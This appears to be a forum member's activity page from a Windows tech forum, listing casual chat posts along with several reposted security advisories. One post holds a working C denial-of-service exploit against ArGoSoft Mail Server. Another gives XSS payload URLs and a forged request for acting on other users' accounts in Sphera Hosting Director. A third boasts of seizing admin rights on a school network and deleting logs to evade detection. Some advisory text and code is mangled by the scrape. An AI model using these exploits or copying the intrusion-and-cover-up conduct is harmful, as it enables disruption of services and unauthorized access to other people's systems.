Jump to content

amdphr3@kXP

Member
 View Profile  See their activity

  • Posts

    395

  • Joined

  • Last visited

  • Donations

    0.00 USD 

  • Country

    Australia

 Content Type 

Everything posted by amdphr3@kXP

  1. amdphr3@kXP
    LOL yeh i thought ud say that
  2. amdphr3@kXP
    Hmm judging by that, i would hav thought that it was an IRQ conflict. Interesting... . Can ya post a screenie of ur device manager? Let us kno if the patch fixes it...
  3. amdphr3@kXP
    yeh just to be sure, write down the sizes and that so u can recreate em how u want them
  4. amdphr3@kXP
    yes, thats right, that was happening to me b4 i put more ram in my pc, now it works like a dream. The error that u described bex, i was gettin that in the form of a BSOD. But instead of it rebooting, it would hang and id hav 2 turn off my pc to get it to reboot
  5. amdphr3@kXP
    Ur partition(s) may hav been corrupted by a virus, I had the same prob with my machine recently and fixed it by repartitioning. Try repartitioning ur drive
  6. amdphr3@kXP
    rufo_what_tiggers_do_best nah not me
  7. amdphr3@kXP
    Well, finally i created a sig, hope yas like it . Appologies to mods/admins for postin it here, this is the only forum i hav rights to upload a file. Can yas please move this to graphics forum?
  8. amdphr3@kXP
    yeh tinman, you should get urself a copy of ver 2, very gud
  9. amdphr3@kXP
    sounds good
  10. amdphr3@kXP
    SE ABEO. The network admin at the school i used to go to had no idea. The network was based on novell netware 4.0. We all got given a login account for loggin in to the server, with our own 10 meg volumes. Anyway when he set em all up, he forgot to disable our permissions to write login scripts. So, I wrote a login script to log me in as an equivelant to an admin, next time i logged in, bam, had admin rights. Deleted the login logs and cleared the login script so they wouldnt catch me
  11. amdphr3@kXP
    what bands/singers/songs do you all like to listen to? I like to listen to a bit of everything. Top ten for me would hav to be: 1. Metallica 2. Evanescence 3. Godskitchen 4. Linkin park 5. DJ Tiesto 6. Millencolin 7. Pennywise 8. Staind 9. Dropkick Murpheys 10. Sex pistols
  12. amdphr3@kXP
    welcome to MSFN, tinbin, hope u enjoy ur stay here
  13. amdphr3@kXP
    lol yeh a free trial version would b nice
  14. amdphr3@kXP
    Denial of Service Attack against ArGoSoft Mail Server Version 1.8 VULNERABLE VERSIONS: 1.8 (1.8.3.5) NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof RISK: Medium IMPACT: Denial of Service Attack Remote DoS : A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote attackers to crash the server by executing too much "get Request. The command can be issued to the Mail server by everyone. The attacker need no authentification. EXPLOIT #include #include #include #include #include int main(int argc, char *argv[]) { int port, sockfd; struct sockaddr_in server; struct hostent *host; char sendstring[1024]; strcpy(sendstring, "GET /index.html HTTP/1.0\n\n"); if(argc { printf("Usage: %s [target] \n", argv[0]); exit(0); } port = atoi(argv[2]); host = gethostbyname(argv[1]); if(host == NULL) { printf("Connection failed!...\n"); exit(0); } server.sin_family = AF_INET; server.sin_port = htons(port); server.sin_addr.s_addr = inet_addr((char*)argv[1]); printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n"); for(; { if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) { printf("socket() failed!\n"); exit(0); } if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) { printf("connect() failed!\n"); close(sockfd); } if (write(sockfd, sendstring, strlen(sendstring)) { break; } close(sockfd); } printf("Attack done!...\n"); } This error will produce an "crash" of the ArGoSoft Mail Server. SOLUTIONS No solution for the moment.
  15. amdphr3@kXP
    Low risk vulnerabilities in ftp file list handling Several ftp parsing libraries are vulnerable to attack by simply feeding them too much data. While the library authors have taken care to be robust in parsing ftp NLST returns they don't iterate the data as they receive it but store the data until the NLST completes. In the case of rpm a user using rpm -Uvh *ftp://foo.bar.com/updates/* and hitting a rogue server can be fed 1Gb of data at which point rpm does a In the case of gnome-1.x the gnome library string routines are used and these use an int for size management. Gnome 2.x fixes this problem and uses size_t so is not exploitable. Even in the non vulnerable applications there are out of memory annoyance value attacks as a result of this way of handling file lists. This attack is not actually that useful fortunately. The end user has to trigger the access, and has to accept >1Gb of data without getting suspicious. In addition the gnome-1.x variant is only exploitable on systems where sizeof(int) I have not inspected other ftp NLST parsing applications but it seems people should take a look to see who else is buffering too much data in RAM or not checking for size wraps. Gnome and RPM maintainers were informed in advance in April.
  16. amdphr3@kXP
    New lyskom-server packages fix denial of service Package : lyskom-server Vulnerability : denial of service Problem-Type : remote Debian-specific: no Calle Dybedahl discovered a bug in lyskom-server which could result in a denial of service where an unauthenticated user could cause the server to become unresponsive as it processes a large query. For the stable distribution (woody) this problem has been fixed in version 2.0.6-1woody1. The old stable distribution (potato) does not contain a lyskom-server package. For the unstable distribution (sid) this problem is fixed in version 2.0.7-2. We recommend that you update your lyskom-server package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1.dsc Size/MD5 checksum: 617 45f4f9b9a90bdfb7187dd31925412fbe -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1.diff.gz Size/MD5 checksum: 9653 0d434e207904d982615607169c86f5cb http://security.debian.org/pool/updates/ma...0.6.orig.tar.gz Size/MD5 checksum: 1408984 ac877a081c01ecfbeb0a4ea0194615f3 Alpha architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_alpha.deb Size/MD5 checksum: 483592 19c29e3b2ccc5bb133a8a8c069f389f4 ARM architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_arm.deb Size/MD5 checksum: 421020 4cd7f320487978f7e9eb7332abbab5b3 Intel IA-32 architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_i386.deb Size/MD5 checksum: 408986 9273e651c49491c50b8b6871fc4fc520 Intel IA-64 architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_ia64.deb Size/MD5 checksum: 552516 065eb6e6d00421f52bdb1e5ae98bddfd HP Precision architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_hppa.deb Size/MD5 checksum: 449420 d5cd68eca819eb4ef251910e51187dde Motorola 680x0 architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_m68k.deb Size/MD5 checksum: 392824 9e947f45837e6e27534a0cfe194b1de0 Big endian MIPS architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_mips.deb Size/MD5 checksum: 461240 4fcc560c13ffbdac8615bbeb4c0bef5e Little endian MIPS architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_mipsel.deb Size/MD5 checksum: 460242 061edb1f105d7630c1561f80ed7b8378 PowerPC architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_powerpc.deb Size/MD5 checksum: 418680 f13215dcb5a9b6bde29fa637b80e71c1 IBM S/390 architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_s390.deb Size/MD5 checksum: 416048 c15aceed3c590a169a4511f95b494fc5 Sun Sparc architecture: -http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6- 1woody1_sparc.deb Size/MD5 checksum: 425290 12dc8973ff9aa88a41136e6fd52abc34 These files will probably be moved into the stable distribution on its next revision.
  17. amdphr3@kXP
    New webmin packages fix remote session ID spoofing Package : webmin Vulnerability : session ID spoofing Problem-Type : remote Debian-specific: no miniserv.pl in the webmin package does not properly handle metacharacters, such as line feeds and carriage returns, in Base64-encoded strings used in Basic authentication. This vulnerability allows remote attackers to spoof a session ID, and thereby gain root privileges. For the stable distribution (woody) this problem has been fixed in version 0.94-7woody1. The old stable distribution (potato) does not contain a webmin package. For the unstable distribution (sid) this problem is fixed in version 1.070-1. We recommend that you update your webmin package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/ma....94-7woody1.dsc Size/MD5 checksum: 1126 68e911f1b0ca669eb8ba250e3c8e9188 http://security.debian.org/pool/updates/ma...7woody1.diff.gz Size/MD5 checksum: 62990 1b96c1d52b1e3315861df4b9b788840e http://security.debian.org/pool/updates/ma....94.orig.tar.gz Size/MD5 checksum: 4831737 114c7ca2557c17faebb627a3de7acb97 Architecture independent components: http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 223628 1cce74d57c8893994e9e751732e3d03e http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 181942 e811fad93db9508eff56bf43e02af243 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 32474 61a7860de06b4c220bc5a073e0228c2f -http://security.debian.org/pool/updates/main/w/webmin/webmin-cluster-software_0.94- 7woody1_all.deb Size/MD5 checksum: 27498 fb58c07651016767072aa185582e1262 -http://security.debian.org/pool/updates/main/w/webmin/webmin-cluster-useradmin_0.94- 7woody1_all.deb Size/MD5 checksum: 30588 db6836541741fcf9dfd4c11e0c8c5c86 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 1250010 c41276d145a5bea9e3a684a07892101c http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 26400 0627034bae9b0128afe4c12680a9825c http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 96410 19dcc297592c48c4c35bbc59e6e3559b http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 54614 dc151a7489baa9b03797412a4157b860 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 27162 90953255ab14012fd81134938f417953 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 21574 b5beb6b9e40c95da6e34797d7a29250e http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 47848 1d4fcb713365e15e08c95f26adb19bb9 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 31260 b5de1505b1e0fc0f1764fa0e836353db http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 103586 d9175bbe682efe11d4209a3d90cdab1b http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 62302 ec02f075f96ab2bcf0fcabb890f4bf59 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 119004 6afc4480515fb840dc7a7732a7d70b23 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 62448 fd5fc92c3c0d9259feba4a4869c518f6 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 196532 eff08cb3653eae193616237978423763 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 77372 11b4fe1d73410f1e43530508c128c604 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 20636 6f115702e3fa9b3d622b92d371e56b2c http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 37828 f28eefac5b5da0c7d3752aaf7440ff9c http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 87808 0b0f39e10987f90879f6367393940ef7 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 35618 5f3fb91dcb493ae563720a6e2d7a1626 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 134034 4b86de5f297b3662a3efd389510bd248 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 235074 ffb041417449df36ae7085c9344eb332 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 89148 64d9b960a740a5be9fab9eb79fb188fd http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 221836 7035074b9a76335e6103a30485e3134c http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 44078 4733ff267ebfc94ba0e6e6481873249d http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 8320 42484bc80e887649fb701adea4cf0c73 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 42774 8f62321c6243e85c61790b290efcc59b http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 26600 ce3679dc5bd620e803c881e15410bc09 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 110828 9fd579f5d5980ddae4768a0459835a99 http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 31774 98f1456602b807a1a84bfcf6075ce9df http://security.debian.org/pool/updates/ma...7woody1_all.deb Size/MD5 checksum: 509038 75fb02b81e729cc0361ebf11d59ef59c Intel IA-32 architecture: http://security.debian.org/pool/updates/ma...woody1_i386.deb Size/MD5 checksum: 29336 ab60b8d46f362e853f0b0417beb44655 These files will probably be moved into the stable distribution on its next revision.
  18. amdphr3@kXP
    SRT2003-06-12-0853 - ike-scan local root format string issue Product : ike-scan Version : 1.0 & 1.1 Local format string issue in logging functions What to do : Please upgrade ike-scan to version 1.2 In the course of performing security assessments and penetration tests for their customers, http://www.nta-monitor.com has found that VPN systems often provide full access to the internal network which makes them tempting targets to an attacker. In addition, many people assume that their VPN servers are invisible and impenetrable which is a dangerous assumption given that research at NTA shows that IPsec VPN systems can be discovered and the manufacturer identified. When this potential for discovery and identification is combined with the fact that several VPN vulnerabilities have been reported in the past few months, it would seem to be only a matter of time before hackers start to target VPN systems. With this in mind, NTA took the decision to raise awareness of this serious industry problem by producing a white paper on how VPN servers can be detected and identified, combined with the development of a security-auditing program "ike-scan." The concepts behind ike-scan can be located in the following pdf. http://www.nta-monitor.com/ike-scan/whitepaper.pdf In a default configuration ike-scan is not suid root. The suid bit is not set during the install. As an admin you may have been tricked by a user that was perhaps higher on the food chain than you and he really wanted to use ike-scan so you had to chmod +s /usr/local/bin/ike-scan for him. In other words there is potential for this to be exploited. [root@Immunity root]# su - nobody sh-2.05$ /usr/local/bin/ike-scan 127.0.0.1 ERROR: Could not bind UDP socket to local port 500 You need to be root, or ike-scan must be suid root to bind to ports below 1024. Only one process may bind to a given port at any one time. bind: Permission denied
  19. amdphr3@kXP
    SuSE Security Announcement: radiusd-cistron (SuSE-SA:2003:030) SuSE Security Announcement Package: radiusd-cistron Announcement-ID: SuSE-SA:2003:030 Date: Friday, Jun 13th 2003 09:32 MET Affected products: 7.2, 7.3, 8.0 Vulnerability Type: possible remote system compromise SuSE default package: no Cross References: http://bugs.debian.org/cgi-bin/bugreport.cgi ?bug=196063 Content of this advisory: 1) security vulnerability resolved: handling too large NAS numbers problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - lprng - frox - poster - ghostscript-library 3) standard appendix (further information) ______________________________________________________________________________ 1) problem description, brief discussion, solution, upgrade information The package radiusd-cistron is an implementation of the RADIUS protocol. Unfortunately the RADIUS server handles too large NAS numbers not correctly. This leads to overwriting internal memory of the server process and may be abused to gain remote access to the system the RADIUS server is running on. There is no temporary workaround known. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Please note, missing packages will be published as soon as possible. Intel i386 Platform: SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8...6.6-88.i386.rpm e61fb299edfb092f24b3e455256cf262 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8....i386.patch.rpm d323307d4bc4c0e4dc0bcef3f848b91f source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8....6.6-88.src.rpm fc7718319972625612292798092d9a8b SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7....4-182.i386.rpm ee949e18ef02e87dffc4b5ea8d5d5ec5 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7...6.4-182.src.rpm f4f87aab549967c0d4c216c8d2e312a1 SuSE-7.2: ftp://ftp.suse.com/pub/suse/i386/update/7....4-182.i386.rpm e5a20985f79c887739ce0b83539c347b source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7...6.4-182.src.rpm f5f73b9e9c3e5d338bfddd1a6b2b14d8 Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/....4-70.sparc.rpm 7318cc63ec3c29618b81ae6c8eb29fc8 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/....6.4-70.src.rpm 0212fba5fd8d4ff3e9afe4a8a8802655 PPC Power PC Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/ppc/update/7....6.4-108.ppc.rpm 30f9920f2a8d2db0e8eb2a0439d61118 source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7....6.4-108.src.rpm 8133911f08442832c383000cb65e70ca ______________________________________________________________________________ 2) Pending vulnerabilities in SuSE Distributions and Workarounds: - lprng A race condition in psbanner was fixed that can be abused by local users to overwrite file owned by daemon:lp. New packages are available on out FTP servers. - frox The init script of frox handled tmp file in an insecure manner. This behavior can be exploited by local users. New packages are available on out FTP servers. - poster A possible buffer overflow due to usage of gets() was fixed which could have been exploited by malicious input data to execute code under the user id of the user running poster. New packages are available on out FTP servers. - ghostscript-library Malicious PostScript[tm] files could execute shell commands even if the ghostscript interpreter was invoked with the -dSAFER flag. ______________________________________________________________________________ 3) standard appendix: authenticity verification, additional information - Package authenticity verification: SuSE update packages are available on many mirror ftp servers all over the world. While this service is being considered valuable and important to the free and open source software community, many users wish to be sure about the origin of the package and its content before installing the package. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package. 1) execute the command md5sum after you downloaded the file from a SuSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key security@suse.de), the checksums show proof of the authenticity of the package. We disrecommend to subscribe to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless. 2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig to verify the signature of the package, where is the filename of the rpm package that you have downloaded. Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import the key that is used by SuSE in rpm packages for SuSE Linux by saving this announcement to a file ("announcement.txt") and running the command (do "su -" to be root): gpg --batch; gpg SuSE Linux distributions version 7.1 and thereafter install the key "build@suse.de" upon installation or upgrade, provided that the package gpg is installed. The file containing the public key is placed at the top-level directory of the first CD (pubring.gpg) and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de . - SuSE runs two security mailing lists to which any interested party may subscribe: suse-security@suse.com - general/linux/SuSE security discussion. All SuSE security announcements are sent to this list. To subscribe, send an email to . suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list. To subscribe, send an email to
  20. amdphr3@kXP
    Sphera Hosting Director Control Panel Multiple Vulnerabilities: XSS-Session Hijacking-DoS/Buffer Overflow-Another User Accounts access Versions: VULNERABLE - 3.x - 2.x - 1.x HostingDirector comprises three fundamental components that are integrated to provide rich offerings, maximum control for resellers and site owners, and easy, centralized administration of shared and dedicated environments running on Linux and Microsoft Windows®. SECURITY HOLES FOUND and PROOFS OF CONCEPT: ----------------------------------------- ---------------- | XSS in LOGIN | ---------------- I encountered XSS ( Cross Site Scripting ) vulnerabilities in the SPHERA's product called Hositng Director , located in the vds ( user of hosting plans ) control panel. The problems , i think , are related to form tag closing by url code injection and the input validation system ( there aren`t any ). In addition the success_msg variable ( in internal scripts ) is vulnerable to XSS too. With this you can insert html and script code by url command passing like this: _______________________ XSS IN THE LOGIN FORM: ----------------------- ]/[iNSTALLATIONhttp://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?uid=">[XSS ATTACK CODE] ]/[iNSTALLATIONhttp://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?error=">[XSS ATTACK CODE] ]/[iNSTALLATIONhttp://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?error=[XSS ATTACK CODE COMBINATED WITH OTHER VARIABLE FOR EMULATE A REAL ERROR LIKE "EITHER PASSWORD OR USER ARE INCORRECT , RE-FILL IN" FOR STEAL THE USER DATA] ]/[iNSTALLATIONhttp://[TARGET]/[iNSTALLATION PATH]/login/login_screen.php?vds_ip=[VDS DOMAIN OR IP]&uid=">[XSS ATTACK CODE]&tz=[TIMEZONE CODE , TRY CEST]&vds_server_ip=">[XSS ATTACK CODE] -------------- | SAMPLES | -------------- ]/[iNSTALLATIONhttps://[TARGET]/[iNSTALLATION PATH]/login/login_screen.php?vds_ip=[VDS DOMAIN OR IP]&uid=">here%20comes%20your%20attack&tz=CEST&vds_server_ip=">He re%20comes%20your%20XSS%20Attack&error=Either+user+or+password+are+incorrect +,+please+re-fill+in+. ]/[iNSTALLATIONhttps://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?uid=">XSS%20! ------------------ | COMMUNICATIONS | | ENCRYPTION | ------------------ Sphera uses an "insecure" communications data encryption ( DES (16) ). DES is a not very secure algorithm ( i think ). In addition the control panel scripts don't check if you are using the https protocol and allow you to use based http connections on port 80 ( without SSL ). ---------------- | SESSION | | HIJACKING | ---------------- This is a very interesting thing in Sphera Hosting Director VDS Control Panel , if you don't close a session in the control panel , the session is saved all the time that you use the cookie and the system don't close the session if you don't close with control panel !. This can be a big security problem if an attacker generates a session id randomicing control. I explain it: if the first session id that you received is this : xx01xx01xxX and the next session id is.. xx01xx02Xxx The first session id only differs in two parts with the second session , this indicates a poor session id randomicing... the attacker can generate a profile analyzing the random session generating and make an algorithm or script for make valid sessions , this can be used for enter the system only changing the USER ID value and you have access to the system with the USER ID permissions ! ;-) I think in another possibilty generating session id randomicing profiles like monitoring the use of resources and the stack blocks but this is very difficult for remote users. The remote method is not very easy but very possible. -------------------- | BUFFER OVERFLOW | | AND DoS | ------------------- I found some possible buffer overflows and Denial of Service attacks . Some php files used by the vds control panel environment can conduct denial of service attacks to the installation server. Other php files can conduct stack attacks by url-based variable hacking and command injection. You can enter some crafted urls spoofing th variables and your referer for make actions in other user accounts. - Some Proof of Concepts - ]/[iNSTALLATIONhttp://[TARGET]/[iNSTALLATION PATH]/dev/VDS/submitted.php Sphera Control Panel global used php file and this file can be used for conduct DoS and Buffer Overflow attacks to the [TARGET] server with Sphera VDS Control Panel installed in [iNSTALLATION PATH] , i tell you some samples: Make a connection in POST mode and request this: ]/[iNSTALLATIONhttp://[TARGET]/[iNSTALLATION PATH]/dev/VDS/submitted.php?[TARGET USER]\activeservices\http||watchdog_running=[false]&restart_vds=on&success_m sg=Remote USER VDS restarted trough this kind of attack I think that the system checks your referer for authenticate the request , but you can spoof it easier. With this kinf of attacks you can make actions in other users hosting accounts like password changing , virtual server restarting watch dog deactivating and other features ;-)
  21. amdphr3@kXP
    note the POS, cuz it is. I just learn to put up with it till i can get a new one, hopefully as soon as i get me tax return. It runs winxp an 2k3 reasonably (surprisingly). I dont even attempt to run games cuz they get a fr of 10fps max in UT...pfft, so theres no point
  22. amdphr3@kXP
    LOL are there any mods available for version 2.0?
  23. amdphr3@kXP
    lol hahaha I got no come back for that one, 0wn3d
  24. amdphr3@kXP
    wow i was just own3d by bex *rufo goes and hides in the corner* w00t
  25. amdphr3@kXP
    Just a little forum to see who enjoys a beer and what kind. Post away! I like beer, and usually drink tooheys extra dry/new/red
×
×
  • Create New...